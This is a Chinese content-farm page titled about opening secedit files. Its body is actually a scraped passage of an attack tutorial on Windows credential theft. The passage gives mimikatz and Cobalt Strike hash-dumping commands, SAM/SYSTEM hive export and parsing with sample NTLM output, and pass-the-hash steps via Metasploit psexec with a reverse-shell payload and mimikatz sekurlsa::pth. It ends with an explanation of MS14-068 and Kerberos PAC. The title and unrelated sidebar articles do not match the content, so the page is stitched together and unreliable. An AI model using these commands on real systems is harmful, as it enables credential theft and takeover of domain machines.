当前位置:首页 > 经验 >

不能打开secedit文件(sec文件格式怎么打开)

来源:原点资讯(www.yd166.com)时间:2022-11-04 00:33:53作者:YD166手机阅读>>

Procdump:https://docs.microsoft.com/zh-cn/sysinternals/downloads/procdump
mimikatz:https://github.com/gentilkiwi/mimikatz/releases

5.使用cobalt strike 获取hash

beacon>hashdump beacon>mimikatz mimikatz指令

6.利用sam表

mimikatz在线读sam表中的hash

privilege::debug token::elevate lsadump::sam

将sam表下载到本地由mimikatz分析

reg save HKLM\SYSTEM system reg save HKLM\SAM SAM 在远端shell使用以上命令导出SYSTEM 和 SAM文件,并将其待会本地,由mimikatz分析 mimikatz运行 mimikatz # lsadump::sam /sam:SAM /system:SYSTEM Domain : STU1 SysKey : fd4639f4e27c79683ae9fee56b44393f Local SID : S-1-5-21-1982601180-2087634876-2293013296 SAMKey : 099d1915db1b0e5cf41f1f0908dc7e17 RID : 000001f4 (500) User : Administrator Hash NTLM: 31d6cfe0d16ae931b73c59d7e0c089c0 RID : 000001f5 (501) User : Guest RID : 000003e8 (1000) User : liukaifeng01 Hash NTLM: 31d6cfe0d16ae931b73c59d7e0c089c0

hash 传递攻击 PTH (Pass the Hash)

1.msf里使用psexec模块

msf5 exploit(multi/handler) > use exploit/windows/smb/psexec //以root启动msf [*] No payload configured, defaulting to windows/meterpreter/reverse_tcp msf5 exploit(windows/smb/psexec) > set lhsot 192.168.64.133 lhsot => 192.168.64.133 msf5 exploit(windows/smb/psexec) > set lhost 192.168.64.133 lhost => 192.168.64.133 msf5 exploit(windows/smb/psexec) > set lport 443 lport => 443 msf5 exploit(windows/smb/psexec) > set rhost 192.168.52.138 rhost => 192.168.52.138 msf5 exploit(windows/smb/psexec) > set SMBUser Administrator SMBUser => Administrator msf5 exploit(windows/smb/psexec) > set SMBPass 8a963371a63944419ec1adf687bb1be5 //一般选择NTLM HASH SMBPass => 8a963371a63944419ec1adf687bb1be5 msf5 exploit(windows/smb/psexec) > run

2.使用mimikatz

我们在目标机里放置mimikatz.exe 然后执行以下命令

sekurlsa::pth /user:administrator /domain:"xxx.com" /ntlm:6542d35ed5ff6ae5e75b875068c5d3bc //自行修改

之后便会弹出一个cmd窗口,在这个窗口里链接机器即可

net use \\192.168.222.131\c$

在cobalt strike里找到域控,然后使用psexec模块,选择一个本地hash即可。

不能打开secedit文件,sec文件格式怎么打开(5)

不能打开secedit文件,sec文件格式怎么打开(6)

MS14-068

这个洞的危害很大,可以让任意域用户提权到域管。
适用版本: server 2000以上
补丁: kb3011780

PAC

PAC是kerberos协议里用来解决用户权限功能所设计出的东西。
在kerberos协议里面,一个用户用自己的hash拿到了TGT,接着凭借着TGT拿到了TGS,接着用TGS去访问服务。看似只要hash正确,用户就能到处访问服务,但是所有服务都可以给这个用户所访问吗?肯定是不行的,所以微软在kerberos为了实现用户权限分级,采用了PAC。
PAC被设计为存在于TGT里面。完整的kerberos权限验证流程如下。

1。用户凭借自己的hash加密时间戳并发送明文用户名到KDC,KDC认证用户成功后返回被krbtgt用户hash加密的TGT(内有ticekt包含着PAC),以及用户自身hash加密的login session key

2.用户凭借TGT票据向KDC发起指定服务的TGS_REQ。KDC用krbtgt hash解密,若解密成功则直接返回服务hash加密的TGS(这里并没考虑用户的权限,直接返回了TGS)

3.用户用TGS向服务发起请求,服务用自己的hash解密TGS后获得PAC,拿着PAC向KDC询问该用户是否有权限访问。KDC拿到PAC后再次解密,得到了PAC里的 用户的sid,以及所在的组,再判断用户是否有访问服务的权限(有些服务不会验证KDC,这样就会导致白银票据攻击)

PAC自身的结构

不能打开secedit文件,sec文件格式怎么打开(7)

PAC在Ticket中的结构

不能打开secedit文件,sec文件格式怎么打开(8)

栏目热文

chm乱码解决办法(chm转txt 乱码)

chm乱码解决办法(chm转txt 乱码)

1、问题在项目开发过程中,遇到需要将页面上选择的文件上传至FTP服务器,遇到一些坑,比如上传文件中文名乱码,上传时指定上...

2022-11-04 00:58:00查看全文 >>

金融市场开放的原因(金融市场开放现状)

金融市场开放的原因(金融市场开放现状)

金融开放 积极推进减税、进一步扩大开放金融市场,这是中国今年以来最具影响力的重要举措。 其中,积极推进减税措施,有利于降...

2022-11-04 00:31:03查看全文 >>

全面开放金融市场对哪些行业影响(中国金融市场全面开放的商机)

全面开放金融市场对哪些行业影响(中国金融市场全面开放的商机)

每经记者:张寿林 每经编辑:廖丹党的十八大以来,我国金融业发展取得举世瞩目的成就,银行业保险业实现新的跨越式发展。202...

2022-11-04 01:11:35查看全文 >>

开放金融到底有多重要(金融开放对中国来说存在的机会)

开放金融到底有多重要(金融开放对中国来说存在的机会)

《中国经济周刊》 记者 谢玮|北京报道在高水平对外开放中,金融业开放是重要的组成部分。回望过去10年,我国金融业对外开放...

2022-11-04 00:49:07查看全文 >>

金融市场开放的利弊(金融市场全面开放的影响)

金融市场开放的利弊(金融市场全面开放的影响)

金融开放是新时代最大的制度红利,也是我国高质量发展取得新成就的重要法宝。对于中国金融开放政策的努力和成绩,各界有目共睹,...

2022-11-04 00:57:22查看全文 >>

sec文件用什么方式打开(如何下载sec上的文件)

sec文件用什么方式打开(如何下载sec上的文件)

导读:本文是对上一篇文章的延续,在阅读本文之前建议先快速阅读一下《InnoDB Page结构详解》创建表结构,插入三条数...

2022-11-04 00:56:37查看全文 >>

chm编辑教程(chm编辑器中文版)

chm编辑教程(chm编辑器中文版)

作为一名编程人员,在学习各种编程语言时,会经常翻阅官方的chm帮助手册学习,那么你是否也想制作一个自己的帮助文档呢?下面...

2022-11-04 00:35:56查看全文 >>

chm格式的缺点(chm格式图解)

chm格式的缺点(chm格式图解)

你在寻找新的电子书阅读软件吗?来看看这四款适用于安卓的可靠的开源电子书阅读器吧。• 来源:linux.cn • 作者:S...

2022-11-04 01:14:15查看全文 >>

chm怎么编辑文件(技术资料用chm编辑器整理)

chm怎么编辑文件(技术资料用chm编辑器整理)

(本‬文‬作‬于‬2013年‬并‬发‬表‬在‬其‬它‬平台,因‬时‬间太久‬个‬别‬配‬图‬已‬不‬能加‬载‬)对于经...

2022-11-04 01:05:59查看全文 >>

secedit打不开文件(editplus文件太大打不开)

secedit打不开文件(editplus文件太大打不开)

第一部分背景360互联网安全中心监测到一种利用被入侵服务器进行门罗币挖矿的僵尸网络,该僵尸网络控制的服务器数量高峰时单日...

2022-11-04 00:34:46查看全文 >>

文档排行